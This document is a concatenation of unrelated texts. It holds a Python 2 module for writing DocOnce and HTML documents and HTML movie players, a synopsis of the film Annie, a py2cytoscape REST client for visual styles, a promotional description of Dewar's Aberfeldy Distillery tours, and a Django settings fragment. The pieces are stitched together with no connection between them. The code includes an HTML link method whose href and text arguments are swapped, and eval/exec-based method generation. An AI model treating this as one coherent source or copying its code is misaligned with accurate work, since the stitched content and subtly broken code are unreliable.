        s = '\nTITLE: %s\n' % title
        for ai in authors_and_institutions:
            authorinfo = '; '.join(ai)
            s += 'AUTHOR: %s\n' % authorinfo
        if date is not None:
            if date == 'today':
                date = self.today_date()
            s += 'DATE: %s\n' % date
        self.file.write(s)
        self.paragraph_separator()

    def heading(self, level, title, label=None):
        """Write a DocOnce heading: = signs on both sides of the title."""
        decoration = '='*level
        self.file.write('\n%s %s %s\n\n' % (decoration, title, decoration))

    def section(self, title, label=None):
        self.heading(7, title, label)

    def subsection(self, title, label=None):
        self.heading(5, title, label)

    def subsubsection(self, title, label=None):
        self.heading(3, title, label)

    def paragraph(self, title, ending='.', label=None):
        s = '\n\n__%s%s__ ' % (title, ending)
        self.file.write(s)

    def paragraph_separator(self):
        """Separate running paragraphs by a blank line."""
        self.file.write('\n\n')

    def text(self, text, indent=0):
        text = _BaseWriter.text(self, text, indent)
        # not necessary since DocOnce is the format for text:
        #text = _BaseWriter.expandtext(self, text,
        #                              INLINE_TAGS, HTML.INLINE_TAGS_SUBST)
        self.file.write(text)

    def list(self, items, listtype='itemize'):
        self.unfold_list(items, self.item_handler, listtype)

    def item_handler(self, item, listtype, level, keyword=None):
        indent = ' '*level
        s = ''
        if item == '_begin':
            if level == 1:
                s += '\n'
        elif item == '_end':
            if level == 1:
                s += '\n'
        else:
            # ordinary item:
            if item is not None:
                if listtype == 'itemize':
                    s += '\n%s%s* %s' % (indent, indent, item)
                elif listtype == 'enumerate':
                    s += '\n%s%so %s' % (indent, indent, item)
                elif listtype == 'description':
                    s += '\n%s%s- %s: %s' % (indent, indent, keyword, item)
        self.file.write(s)

    def verbatim(self, code):
        self.file.write('\n!bc\n' + r'%s' % code + '\n!ec\n')

    def figure(self, filename, caption, width=None, height=None, label=None):
        filename = self.figure_conversion(filename, \
                   ('.jpg', '.gif', '.png', '.ps', '.eps'))
        s = '\nFIGURE:[%s,' % filename
        if width:
            s += ' width=%s ' % width
        if height:
            # bugfix: the height option previously interpolated width
            s += ' height=%s ' % height
        s += '] ' + caption + '\n'
        self.file.write(s)

    def table(self, table, column_headline_pos='c', column_pos='c'):
        # Better to factor out code in misc.csv2table!
        # See how we do it with html movie...

        # find max column width
        mcw = 0
        for row in table:
            mcw = max(mcw, max([len(str(c)) for c in row]))
        formatted_table = []  # table where all columns have equal width
        column_format = '%%-%ds' % mcw
        for row in table:
            formatted_table.append([column_format % c for c in row])
        width = len(' | '.join(formatted_table[0])) + 4
        s = '\n\n |' + '-'*(width-2) + '|\n'
        for row in formatted_table:
            s += ' | ' + ' | '.join(row) + ' |\n'
        s += ' |' + '-'*(width-2) + '|\n\n'
        self.file.write(s)

    def url(self, url_address, link_text=None):
        if link_text is None:
            link_text = 'link'  # problems with DocOnce and empty link text
        self.file.write(' %s<%s>' % (url_address, link_text))

    def link(self, link_text, link_target):
        """Typeset a hyperlink as 'text (target)'."""
        self.file.write('%s (%s)' % (link_text, link_target))

    # autogenerate doc strings by combining parent class doc strings
    # with subclass doc strings:
    for method in [title, section, subsection, subsubsection,
                   paragraph, text,
                   verbatim, # not defined here: math, raw,
                   figure, table, url,
                   list, item_handler,]:
        method.__doc__ = makedocstr(_BaseWriter, method)
class HTML(_BaseWriter):
    """Document writer emitting plain HTML."""

    # class variables controlling <table> attributes:
    table_border = '2'
    table_cellpadding = '5'
    table_cellspacing = '2'

    INLINE_TAGS_SUBST = {  # from inline tags to HTML tags
        # keep math as is:
        'math': None,  # indicates no substitution
        'math2': r'\g<begin>\g<puretext>\g<end>',
        'emphasize': r'\g<begin><em>\g<subst></em>\g<end>',
        'bold': r'\g<begin><b>\g<subst></b>\g<end>',
        'verbatim': r'\g<begin><tt>\g<subst></tt>\g<end>',
        }

    # NOTE: the loop at the bottom of this class copies doc strings from
    # _BaseWriter for the listed methods, so those methods deliberately
    # carry no doc strings of their own.

    def __init__(self):
        _BaseWriter.__init__(self, 'html', '.html')
        self.header()

    def header(self):
        """Open the HTML document (called from the constructor)."""
        s = """\
<!-- HTML document generated by %s.%s -->
<html>
<body bgcolor="white">
""" % (__name__, self.__class__.__name__)
        self.file.write(s)

    def footer(self):
        """Close the HTML document (called from write_to_file)."""
        s = """
</body>
</html>
"""
        self.file.write(s)

    def title(self, title, authors_and_institutions=[], date='today'):
        s = """
<title>%s</title>
<center><h1>%s</h1></center>
""" % (title, title)
        for ai in authors_and_institutions:
            author = ai[0]
            s += """
<center>
<h4>%s</h4>""" % author
            for inst in ai[1:]:
                s += """
<h6>%s</h6>""" % inst
            s += """\n</center>\n\n"""
        if date is not None:
            if date == 'today':
                date = self.today_date()
            s += """<center>%s</center>\n\n\n""" % date
        self.file.write(s)
        self.paragraph_separator()

    def heading(self, level, title, label=None):
        """Write an <hN> heading, optionally with a named anchor."""
        if label is None:
            s = """\n<h%d>%s</h%d>\n""" % (level, title, level)
        else:
            # bugfix: the anchor was previously emitted as an unclosed
            # <a href="..."> tag; a navigation label is a link *target*,
            # so it belongs in the name attribute and must be closed.
            s = """\n<h%d><a name="%s">%s</a></h%d>\n""" % \
                (level, label, title, level)
        self.file.write(s)

    def section(self, title, label=None):
        self.heading(1, title, label)

    def subsection(self, title, label=None):
        self.heading(3, title, label)

    def subsubsection(self, title, label=None):
        self.heading(4, title, label)

    def paragraph(self, title, ending='.', label=None):
        s = '\n\n<p><!-- paragraph with heading -->\n<b>%s%s</b>\n' \
            % (title, ending)
        if label is not None:
            s += '<a name="%s">\n' % label
        self.file.write(s)

    def paragraph_separator(self):
        """Separate running paragraphs with a <p> tag."""
        self.file.write('\n<p>\n')

    def text(self, text, indent=0):
        text = _BaseWriter.text(self, text, indent)
        text = _BaseWriter.expandtext(self, text,
                                      INLINE_TAGS, HTML.INLINE_TAGS_SUBST)
        self.file.write(text)

    def list(self, items, listtype='itemize'):
        self.unfold_list(items, self.item_handler, listtype)

    def item_handler(self, item, listtype, level, keyword=None):
        indent = ' '*level
        s = ''
        if item == '_begin':
            if listtype == 'itemize':
                s += '\n%s<ul>' % indent
            elif listtype == 'enumerate':
                s += '\n%s<ol>' % indent
            elif listtype == 'description':
                s += '\n%s<dl>' % indent
            s += ' <!-- start of "%s" list -->\n' % listtype
        elif item == '_end':
            if listtype == 'itemize':
                s += '%s</ul>' % indent
            elif listtype == 'enumerate':
                s += '%s</ol>' % indent
            elif listtype == 'description':
                s += '%s</dl>' % indent
            s += ' <!-- end of "%s" list -->\n' % listtype
        else:
            # ordinary item:
            if item is not None:
                if listtype in ('itemize', 'enumerate'):
                    s += '%s%s<p><li> %s\n' % (indent, indent, item)
                else:
                    s += '%s%s<p><dt>%s</dt><dd>%s</dd>\n' % \
                         (indent, indent, keyword, item)
        self.file.write(s)

    def verbatim(self, code):
        self.file.write('\n<pre>' + r'%s' % code + '\n</pre>\n')

    def figure(self, filename, caption, width=None, height=None, label=None):
        filename = self.figure_conversion(filename, ('.jpg', '.gif', '.png'))
        if width:
            width = ' width=%s ' % width
        else:
            width = ''
        if height:
            # bugfix: this branch previously emitted ' width=%s ' % width,
            # so the height argument never reached the <img> tag
            height = ' height=%s ' % height
        else:
            height = ''
        s = '\n<hr><img src="%s"%s%s>\n<p><em>%s</em>\n<hr><p>\n' % \
            (filename, width, height, caption)
        self.file.write(s)

    def table(self, table, column_headline_pos='c', column_pos='c'):
        s = '\n<p>\n<table border="%s" cellpadding="%s" cellspacing="%s">\n' %\
            (HTML.table_border, HTML.table_cellpadding, HTML.table_cellspacing)
        for line in table:
            s += '<tr>'
            for column in line:
                s += '<td>%s</td>' % column
            s += '</tr>\n'
        s += '</table>\n\n'
        self.file.write(s)

    def url(self, url_address, link_text=None):
        if link_text is None:
            link_text = url_address
        self.file.write('\n<a href="%s">%s</a>\n' % (url_address, link_text))

    def link(self, link_text, link_target):
        """Typeset a hyperlink with explicit text and target."""
        self.file.write('\n<a href="%s">%s</a>\n' % (link_text, link_target))

    # autogenerate doc strings by combining parent class doc strings
    # with subclass doc strings:
    for method in [title, section, subsection, subsubsection,
                   paragraph, text,
                   verbatim, # not defined here: math, raw,
                   figure, table, url,
                   list, item_handler,]:
        method.__doc__ = makedocstr(_BaseWriter, method)
class LaTeX(_BaseWriter):
    """Unsupported writer: generate DocOnce output and filter it to LaTeX."""

    def __init__(self):
        # Direct LaTeX generation is intentionally not implemented.
        raise NotImplementedError(
            'Use DocOnce class instead and filter to LaTeX')
# Efficient way of generating class DocWriter.
# A better way (for pydoc and other API references) is to
# explicitly list all methods and their arguments and then add
# the body for writer in self.writers: writer.method(arg1, arg2, ...)
class DocWriter:
    """
    DocWriter can write documents in several formats at once.
    """
    # names of the writer methods that are dispatched to every underlying
    # writer; used by the autogeneration loop below this class
    methods = 'title', 'section', 'subsection', 'subsubsection', \
              'paragraph', 'paragraph_separator', 'text', 'list', \
              'verbatim', 'math', 'raw', 'url', 'link', \
              'write_to_file', 'figure', 'table',

    def __init__(self, *formats):
        """
        @param formats: sequence of strings specifying the desired formats.
        """
        # NOTE: eval turns each format name into an instance of the writer
        # class of the same name (e.g. 'HTML' -> HTML()); format names must
        # therefore be trusted input
        self.writers = [eval(format)() for format in formats]

    def documents(self):
        # list of formatted documents, one string per writer
        return [writer.document for writer in self.writers]

    def __str__(self):
        # concatenation of all writers' documents, each with a banner
        s = ''
        for writer in self.writers:
            s += '*'*60 + \
                 '\nDocWriter: format=%s (without footer)\n' % \
                 writer.__class__.__name__ + '*'*60
            s += str(writer)
        return s

    def dispatcher(self, *args, **kwargs):
        # forward the call (self.method_name) to every writer
        #print 'in dispatcher for', self.method_name, 'with args', args, kwargs
        #self.history = (self.method_name, args, kwargs)
        for writer in self.writers:
            s = getattr(writer, self.method_name)(*args, **kwargs)

    '''
    Alternative to attaching separate global functions:
    def __getattribute__(self, name):
        print 'calling __getattribute__ with', name
        if name in DocWriter.methods:
            self.method_name = name
            return self.dispatcher
        else:
            return object.__getattribute__(self, name)

    # can use inspect module to extract doc of all methods and
    # put this doc in __doc__
    '''
# Autogenerate methods in class DocWriter (with right
# method signature and doc strings stolen from class _BaseWriter (!)):
import inspect

def func_to_method(func, class_, method_name=None):
    # attach a plain function as a method of class_ (under method_name,
    # or the function's own name if method_name is None)
    setattr(class_, method_name or func.__name__, func)

# For each dispatched method: read its signature and doc string from
# _BaseWriter, generate source for a forwarding function with the same
# signature, and attach it to DocWriter via func_to_method.
for method in DocWriter.methods:
    docstring = eval('_BaseWriter.%s.__doc__' % method)
    # extract function signature:
    a = inspect.getargspec(eval('_BaseWriter.%s' % method))
    if a[3] is not None:  # keyword arguments?
        # rebuild 'name=default' strings for the trailing defaults
        kwargs = ['%s=%r' % (arg, value) \
                  for arg, value in zip(a[0][-len(a[3]):], a[3])]
        args = a[0][:-len(a[3])]
        allargs = args + kwargs
    else:
        allargs = a[0]
    #print method, allargs, '\n', a
    signature_def = '%s(%s)' % (method, ', '.join(allargs))
    signature_call = '%s(%s)' % (method, ', '.join(a[0][1:]))  # exclude self
    code = """\
def _%s:
    '''\
%s
    '''
    for writer in self.writers:
        writer.%s
func_to_method(_%s, DocWriter, '%s')
""" % (signature_def, docstring, signature_call, method, method)
    #print 'Autogenerating\n', code
    exec code
def html_movie(plotfiles, interval_ms=300, width=800, height=600,
               casename=None):
    """
    Takes a list plotfiles, such as::

        'frame00.png', 'frame01.png', ...

    and creates javascript code for animating the frames as a movie in HTML.

    The `plotfiles` argument can be of three types:

      * A Python list of the names of the image files, sorted in correct
        order. The names can be filenames of files reachable by the
        HTML code, or the names can be URLs.
      * A filename generator using Unix wildcard notation, e.g.,
        ``frame*.png`` (the files must be accessible for the HTML code).
      * A filename generator using printf notation for frame numbering
        and limits for the numbers. An example is ``frame%0d.png:0->92``,
        which means ``frame00.png``, ``frame01.png``, ..., ``frame92.png``.
        This specification of `plotfiles` also allows URLs, e.g.,
        ``http://mysite.net/files/frames/frame_%04d.png:0->320``.

    If `casename` is None, a casename based on the full relative path of the
    first plotfile is used as tag in the variables in the javascript code
    such that the code for several movies can appear in the same file
    (i.e., the various code blocks employ different variables because
    the variable names differ).

    The returned result is text strings that incorporate javascript to
    loop through the plots one after another. The html text also features
    buttons for controlling the movie.
    The parameter `interval_ms` is the time interval between loading
    successive images and is in milliseconds.

    The `width` and `height` parameters do not seem to have any effect
    for reasons not understood.

    The following strings are returned: header, javascript code, form
    with movie and buttons, footer, and plotfiles::

        header, jscode, form, footer, plotfiles = html_movie('frames*.png')
        # Insert javascript code in some HTML file
        htmlfile.write(jscode + form)
        # Or write a new standalone file that act as movie player
        filename = plotfiles[0][:-4] + '.html'
        htmlfile = open(filename, 'w')
        htmlfile.write(header + jscode + form + footer)
        htmlfile.close()

    This function is based on code written by R. J. LeVeque, based on
    a template from Alan McIntyre.
    """
    # Alternative method:
    # http://stackoverflow.com/questions/9486961/animated-image-with-javascript

    # Start with expanding plotfiles if it is a filename generator
    if not isinstance(plotfiles, (tuple,list)):
        if not isinstance(plotfiles, (str,unicode)):
            raise TypeError('plotfiles must be list or filename generator, not %s' % type(plotfiles))

        filename_generator = plotfiles
        if '*' in filename_generator:
            # frame_*.png
            if filename_generator.startswith('http'):
                raise ValueError('Filename generator %s cannot contain *; must be like http://some.net/files/frame_%%04d.png:0->120' % filename_generator)

            plotfiles = glob.glob(filename_generator)
            if not plotfiles:
                raise ValueError('No plotfiles on the form %s' %
                                 filename_generator)
            plotfiles.sort()

        elif '->' in filename_generator:
            # frame_%04d.png:0->120
            # http://some.net/files/frame_%04d.png:0->120
            p = filename_generator.split(':')
            filename = ':'.join(p[:-1])
            if not re.search(r'%0?\d+', filename):
                raise ValueError('Filename generator %s has wrong syntax; missing printf specification as in frame_%%04d.png:0->120' % filename_generator)
            if not re.search(r'\d+->\d+', p[-1]):
                raise ValueError('Filename generator %s has wrong syntax; must be like frame_%%04d.png:0->120' % filename_generator)
            p = p[-1].split('->')
            lo, hi = int(p[0]), int(p[1])
            plotfiles = [filename % i for i in range(lo,hi+1,1)]

    # Check that the plot files really exist, if they are local on the computer
    if not plotfiles[0].startswith('http'):
        missing_files = [fname for fname in plotfiles
                         if not os.path.isfile(fname)]
        if missing_files:
            raise ValueError('Missing plot files: %s' %
                             str(missing_files)[1:-1])

    if casename is None:
        # Use plotfiles[0] as the casename, but remove illegal
        # characters in variable names since the casename will be
        # used as part of javascript variable names.
        casename = os.path.splitext(plotfiles[0])[0]
        # Use _ for invalid characters
        casename = re.sub('[^0-9a-zA-Z_]', '_', casename)
        # Remove leading illegal characters until we find a letter or underscore
        casename = re.sub('^[^a-zA-Z_]+', '', casename)

    filestem, ext = os.path.splitext(plotfiles[0])
    # bugfix: the original compared ext == 'gif' (missing dot), so valid
    # .gif files were always rejected
    if ext not in ('.png', '.jpg', '.jpeg', '.gif'):
        raise ValueError('Plotfiles (%s, ...) must be PNG, JPEG, or GIF files with '\
                         'extension .png, .jpg/.jpeg, or .gif' % plotfiles[0])

    header = """\
<html>
<head>
</head>
<body>
"""
    no_images = len(plotfiles)
    jscode = """
<script language="Javascript">
<!---
var num_images_%(casename)s = %(no_images)d;
var img_width_%(casename)s = %(width)d;
var img_height_%(casename)s = %(height)d;
var interval_%(casename)s = %(interval_ms)d;
var images_%(casename)s = new Array();

function preload_images_%(casename)s()
{
   t = document.getElementById("progress");
""" % vars()

    # one preload statement per frame
    i = 0
    for fname in plotfiles:
        jscode += """
   t.innerHTML = "Preloading image ";
   images_%(casename)s[%(i)s] = new Image(img_width_%(casename)s, img_height_%(casename)s);
   images_%(casename)s[%(i)s].src = "%(fname)s";
""" % vars()
        i = i+1
    jscode += """
   t.innerHTML = "";
}

function tick_%(casename)s()
{
   if (frame_%(casename)s > num_images_%(casename)s - 1)
       frame_%(casename)s = 0;

   document.name_%(casename)s.src = images_%(casename)s[frame_%(casename)s].src;
   frame_%(casename)s += 1;
   tt = setTimeout("tick_%(casename)s()", interval_%(casename)s);
}

function startup_%(casename)s()
{
   preload_images_%(casename)s();
   frame_%(casename)s = 0;
   setTimeout("tick_%(casename)s()", interval_%(casename)s);
}

function stopit_%(casename)s()
{ clearTimeout(tt); }

function restart_%(casename)s()
{ tt = setTimeout("tick_%(casename)s()", interval_%(casename)s); }

function slower_%(casename)s()
{ interval_%(casename)s = interval_%(casename)s/0.7; }

function faster_%(casename)s()
{ interval_%(casename)s = interval_%(casename)s*0.7; }

// --->
</script>
""" % vars()
    plotfile0 = plotfiles[0]
    form = """
<form>
<input type="button" value="Start movie" onClick="startup_%(casename)s()">
<input type="button" value="Pause movie" onClick="stopit_%(casename)s()">
<input type="button" value="Restart movie" onClick="restart_%(casename)s()">
<input type="button" value="Slower" onClick="slower_%(casename)s()">
<input type="button" value="Faster" onClick="faster_%(casename)s()">
</form>

<p><div ID="progress"></div></p>
<img src="%(plotfile0)s" name="name_%(casename)s" border=2/>
""" % vars()
    footer = '\n</body>\n</html>\n'
    return header, jscode, form, footer, plotfiles
def html_movie_embed(moviefile, width=400, height=400):
    """
    Return HTML for embedding a moviefile using the default
    handling of such files.
    """
    # Substitution values for the <embed> template below.
    values = {'moviefile': moviefile, 'width': width, 'height': height}
    template = """
<embed src="%(moviefile)s"
width="%(width)s"
height="%(height)s"
autoplay="false"
loop="true">
</embed>
"""
    return template % values
def html_movie_embed_wmp(moviefile, width=400, height=400):
    """Return HTML text for embedding a movie file
    (Windows Media Player code)."""
    # Object/embed markup targeting the Windows Media Player ActiveX
    # control, with an <embed> fallback for non-IE browsers.
    values = {'moviefile': moviefile, 'width': width, 'height': height}
    template = """
<object id="MediaPlayer1" width="180" height="200"
classid="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95"
codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701"
standby="Loading Microsoft Windows Media Player components..."
type="application/x-oleobject" align="middle">
<param name="FileName" value="%(moviefile)s">
<param name="ShowStatusBar" value="True">
<param name="DefaultFrame" value="mainFrame">
<param name="autostart" value="false">
<embed type="application/x-mplayer2"
pluginspage = "http://www.microsoft.com/Windows/MediaPlayer/"
src="%(moviefile)s"
autostart="false"
align="middle"
width="%(width)s"
height="%(height)s"
loop="100"
defaultframe="rightFrame"
showstatusbar="true">
</embed>
</object>
<!--
<a href="%(moviefile)s"><font size="2">Download movie file</font></a>
<a href="http://www.microsoft.com/windows/windowsmedia/mp10/default.aspx">
<font size="1">Download Windows Media Player</font></a></p>
-->
<!--
Attributes of the <embed> tag are:
src - tells what file to use.
autostart="true" - tells the computer to start the Video playing upon loading the page.
autostart="false" - tells the computer not to start the Video playing upon loading the page. You must click the start button to make the Video play.
align=middle - tells the computer to put the start/stop buttons to the middle.
width= and height= - are the dimensions of a small button panel that will appear when the page loads and contains both a START & STOP button so the visitor can start/stop the Video.
loop=2 - will play the Video for two complete loops.
-->
"""
    return template % values
def html_movie_embed_qt(moviefile, width=400, height=400):
    """Return HTML for embedding a moviefile (QuickTime code)."""
    # Substitution values for the QuickTime <object>/<embed> template.
    values = {'moviefile': moviefile, 'width': width, 'height': height}
    template = """
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
codebase="http://www.apple.com/qtactivex/qtplugin.cab"
width="%(width)s" height="%(height)s" >
<param name="src" value="%(moviefile)s" >
<param name="autoplay" value="false" >
<embed src="%(moviefile)s"
pluginspage="http://www.apple.com/quicktime/download"
width="%(width)s" height="%(height)s" autoplay="false">
</embed>
</object>
"""
    return template % values
def _test(d):
    """
    Smoke-test a document writer: emit a title, sections, running text,
    lists, verbatim code and a table, print the document, and save it to
    a file named ``tmp_<ClassName>``.
    """
    # d is formatclass() or DocWriter(HTML, LaTeX, ...)
    # NOTE: Python 2 print statements -- this module targets Python 2.
    print '\n\n', '*'*70, \
          '\n*** Testing class "%s"\n' % d.__class__.__name__, '*'*70
    # Title plus a single (name, institution, institution) author entry.
    d.title('My Test of Class %s' % d.__class__.__name__,
            [('Hans Petter Langtangen',
              'Simula Research Laboratory',
              'Dept. of Informatics, Univ. of Oslo'),
             ])
    d.section('First Section')
    d.text("""
Here is some
text for section 1.
This is a *first* example of using the _DocWriter
module_ for writing documents from *Python* scripts.
It could be a nice tool since we do not need to bother
with special typesetting, such as `fixed width fonts`
in plain text.
""")
    d.subsection('First Subsection')
    d.text('Some text for the subsection.')
    d.paragraph('Test of a Paragraph')
    d.text("""
Some paragraph text taken from "Documenting Python": The Python language
has a substantial body of documentation, much of it contributed by various
authors. The markup used for the Python documentation is based on
LaTeX and requires a significant set of macros written specifically
for documenting Python. This document describes the macros introduced
to support Python documentation and how they should be used to support
a wide range of output formats.
This document describes the document classes and special markup used
in the Python documentation. Authors may use this guide, in
conjunction with the template files provided with the distribution, to
create or maintain whole documents or sections.
If you're interested in contributing to Python's documentation,
there's no need to learn LaTeX if you're not so inclined; plain text
contributions are more than welcome as well.
""")
    d.text('Here is an enumerate list:')
    # Nested sub-lists are expressed as nested Python lists.
    samplelist = ['item1', 'item2',
                  ['subitem1', 'subitem2'],
                  'item3',
                  ['subitem3', 'subitem4']]
    d.list(samplelist, listtype='enumerate')
    d.text('...with some trailing text.')
    d.subsubsection('First Subsubsection with an Itemize List')
    d.list(samplelist, listtype='itemize')
    d.text('Here is some Python code:')
    d.verbatim("""
class A:
    pass

class B(A):
    pass

b = B()
b.item = 0  # create a new attribute
""")
    d.section('Second Section')
    d.text('Here is a description list:')
    # Description lists use 'keyword: text' items; only the first colon
    # separates the keyword from the description.
    d.list(['keyword1: item1', 'keyword2: item2 goes here, with a colon : and some text after',
            ['key3: subitem1', 'key4: subitem2'],
            'key5: item3',
            ['key6: subitem3', 'key7: subitem4']],
           listtype='description')
    d.paragraph_separator()
    d.text('And here is a table:')
    d.table([['a', 'b'], ['c', 'd'], ['e', 'and a longer text']])
    # Dump the document to stdout and write it to tmp_<ClassName>.
    print d
    d.write_to_file('tmp_%s' % d.__class__.__name__)
if __name__ == '__main__':
    # Run the smoke test on each concrete writer class, then on a
    # combined DocWriter dispatching to all of them (by class name).
    formats = HTML, DocOnce
    for fmt in formats:
        writer = fmt()
        _test(writer)
    format_names = [fmt.__name__ for fmt in formats]
    combined = DocWriter(*format_names)
    _test(combined)
|
Annie is a young, happy foster kid who's also tough enough to make her way on the streets of New York in 2014. Originally left by her parents as a baby with the promise that they'd be back for her someday, it's been a hard knock life ever since with her mean foster mom Miss Hannigan. But everything's about to change when the hard-nosed tycoon and New York mayoral candidate Will Stacks makes a thinly-veiled campaign move and takes her in.
|
from . import BASE_URL, HEADERS
import requests
import json
import pandas as pd
import warnings

# Emit a deprecation notice as soon as this module is imported.
warnings.warn('\n\n\n**** data.style will be deprecated in the next py2cytoscape release. ****\n\n\n')
class Style(object):
    """Client-side handle for a named Cytoscape Visual Style over REST.

    Wraps the ``styles/<name>/`` endpoints: visual-property defaults and
    discrete/continuous/passthrough mappings.
    """

    def __init__(self, name):
        """Create a handle for the style called *name*.

        :param name: immutable name of the Visual Style (required).
        :raises ValueError: if *name* is None.
        """
        if name is None:
            raise ValueError("Style name is required.")
        self.__name = name
        self.__url = BASE_URL + 'styles/' + str(name) + '/'

    def get_name(self):
        """
        Get immutable name of this Visual Style.

        :return: Style name as string
        """
        return self.__name

    def __get_new_mapping(self, mapping_type, column=None, col_type='String',
                          vp=None):
        # Build the skeleton dict shared by all mapping types.
        if column is None or vp is None:
            raise ValueError('both column name and visual property are required.')
        return {
            'mappingType': mapping_type,
            'mappingColumn': column,
            'mappingColumnType': col_type,
            'visualProperty': vp
        }

    def create_discrete_mapping(self, column=None, col_type='String',
                                vp=None, mappings=None):
        """Create a discrete mapping from column values to VP values."""
        self.__call_create_mapping(
            self.__get_discrete(column=column, col_type=col_type, vp=vp,
                                mappings=mappings))

    def create_continuous_mapping(self, column=None, col_type='String',
                                  vp=None, points=None):
        """Create a continuous mapping defined by a list of points."""
        self.__call_create_mapping(
            self.__get_continuous(column=column, col_type=col_type, vp=vp,
                                  points=points))

    def create_passthrough_mapping(self, column=None, col_type='String',
                                   vp=None):
        """Map the column value directly onto the visual property."""
        self.__call_create_mapping(
            self.__get_passthrough(column=column, col_type=col_type, vp=vp))

    def __call_create_mapping(self, mapping):
        # POST the new mapping (as a one-element list) to the style.
        url = self.__url + 'mappings'
        requests.post(url, data=json.dumps([mapping]), headers=HEADERS)

    def __get_passthrough(self, column=None, col_type='String', vp=None):
        return self.__get_new_mapping('passthrough', column=column,
                                      col_type=col_type, vp=vp)

    def __get_discrete(self, column=None, col_type='String', vp=None,
                       mappings=None):
        new_mapping = self.__get_new_mapping('discrete', column=column,
                                             col_type=col_type, vp=vp)
        if mappings is None:
            raise ValueError('key-value pair object (mappings) is required.')
        new_mapping['map'] = [{'key': key, 'value': mappings[key]}
                              for key in mappings.keys()]
        return new_mapping

    def __get_continuous(self, column=None, col_type='String', vp=None,
                         points=None):
        # Error message fixed: this parameter is 'points', not 'mappings'.
        if points is None:
            raise ValueError('key-value pair object (points) is required.')
        new_mapping = self.__get_new_mapping('continuous', column=column,
                                             col_type=col_type, vp=vp)
        new_mapping['points'] = points
        return new_mapping

    def get_mapping(self, vp=None):
        """Return the mapping attached to visual property *vp*."""
        if vp is None:
            raise ValueError('Visual Property ID is required.')
        url = self.__url + 'mappings/' + vp
        return requests.get(url).json()

    def get_mappings(self):
        """Return all mappings defined on this style."""
        url = self.__url + 'mappings'
        return requests.get(url).json()

    def get_default(self, vp=None):
        """Return the default value of *vp* as a one-element pandas Series.

        :raises ValueError: if *vp* is None.
        """
        if vp is None:
            raise ValueError('Visual Property ID is required.')
        url = self.__url + 'defaults/' + vp
        # Fetch once and decode; the previous version issued the same GET
        # twice and printed the raw payload (debug leftover).
        key_value_pair = requests.get(url).json()
        return pd.Series(
            {key_value_pair['visualProperty']: key_value_pair['value']})

    def get_defaults(self):
        """Return all visual-property defaults as a pandas Series."""
        url = self.__url + 'defaults'
        result = requests.get(url).json()['defaults']
        vals = {entry['visualProperty']: entry['value'] for entry in result}
        return pd.Series(vals)

    def update_defaults(self, prop_value_dict):
        """
        Updates the value of one or more visual properties.

        :param prop_value_dict: Dictionary containing, for each visual property,
            the new value to use.
        """
        body = [{'visualProperty': key, 'value': value}
                for key, value in prop_value_dict.items()]
        url = self.__url + 'defaults'
        requests.put(url, data=json.dumps(body), headers=HEADERS)

    # Delete Methods

    def delete_mapping(self, vp=None):
        """Delete the mapping for *vp*; a None *vp* is silently ignored."""
        if vp is None:
            return
        url = self.__url + 'mappings/' + vp
        requests.delete(url)

    def delete_mappings(self):
        """Delete all mappings defined on this style."""
        url = self.__url + 'mappings'
        requests.delete(url)
class StyleUtil(object):
    """Helpers that build point lists for continuous mappings."""

    @staticmethod
    def create_point(value, lesser, equal, greater):
        """Return a one-element list holding a continuous-mapping point.

        :param value: column value at which the point applies (stringified).
        :param lesser/equal/greater: VP values below/at/above *value*.
        """
        return [
            {
                'value': str(value),
                'lesser': lesser,
                'equal': equal,
                'greater': greater
            }
        ]

    @staticmethod
    def create_2_color_gradient(min=0, max=10, colors=('red', 'green')):
        """Return two points spanning a color gradient from min to max."""
        point_1 = StyleUtil.create_point(min, colors[0], colors[0], colors[0])
        point_2 = StyleUtil.create_point(max, colors[1], colors[1], colors[1])
        return point_1 + point_2

    @staticmethod
    def create_3_color_gradient(min=-5, mid=0, max=5, colors=('blue', 'white', 'red')):
        """Return three points for a min/mid/max color gradient."""
        # Reuses create_point, as the previous inline version suggested.
        points = []
        for value, color in zip((min, mid, max), colors):
            points += StyleUtil.create_point(value, color, color, color)
        return points

    @staticmethod
    def create_slope(min=0, max=10, values=(1, 10)):
        """Return two points interpolating numeric values from min to max."""
        point_1 = StyleUtil.create_point(min, values[0], values[0], values[0])
        point_2 = StyleUtil.create_point(max, values[1], values[1], values[1])
        return point_1 + point_2
|
Distilleries are always great attractions, and Dewar’s Aberfeldy Distillery is no different. There is more than just a guided tour of the distillery on offer, with the opportunity for visitors to relax in the café and whisky lounge.
The café offers great food all made from local produce with sandwiches, soups and afternoon tea available. Alternatively, you could choose to relax in the whisky lounge, purchasing a dram or tasting flight from the bar, all under the guidance of staff who really know their stuff when it comes to whisky.
The onsite distillery shop gives you the opportunity to buy from the full John Dewar & Sons Fine Whisky Emporium range. There’s also the exclusive single cask fill your own bottle option.
Dewar’s offers a range of great experiences, so they really do have all the bases covered. The photography and cask tasting tour is priced at £17, and you get the rare chance of photographing the whisky stills while tasting from a cask.
The distillery tour is £9.50 with an expert guide taking you around the distillery, and there’s a tasting opportunity in the whisky lounge. The cask tasting tour is £17, and you get the chance to taste the exclusive single malt with a complimentary glass on offer too. If you’re a whisky connoisseur, you may wish to buy a ticket for the specialist tour priced at £27. You get the chance to taste a range of the finest whiskies in the lounge. The blender’s tour is £75 with a full cask tour and then the chance to create your own blend to take home.
Dewar’s Aberfeldy Distillery is open seven days a week and is accessible by car with parking available on site.
|
"""LEAD common settings."""
# Imports
from pathlib import Path
# Project base directory
BASE_DIR = Path(__file__).absolute().parent.parent.parent
# Installed applications
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ckeditor',
'gl_site'
)
# Configure middleware
MIDDLEWARE = (
# Security
'django.middleware.security.SecurityMiddleware',
# Whitenoise
'whitenoise.middleware.WhiteNoiseMiddleware',
# Other
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
)
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
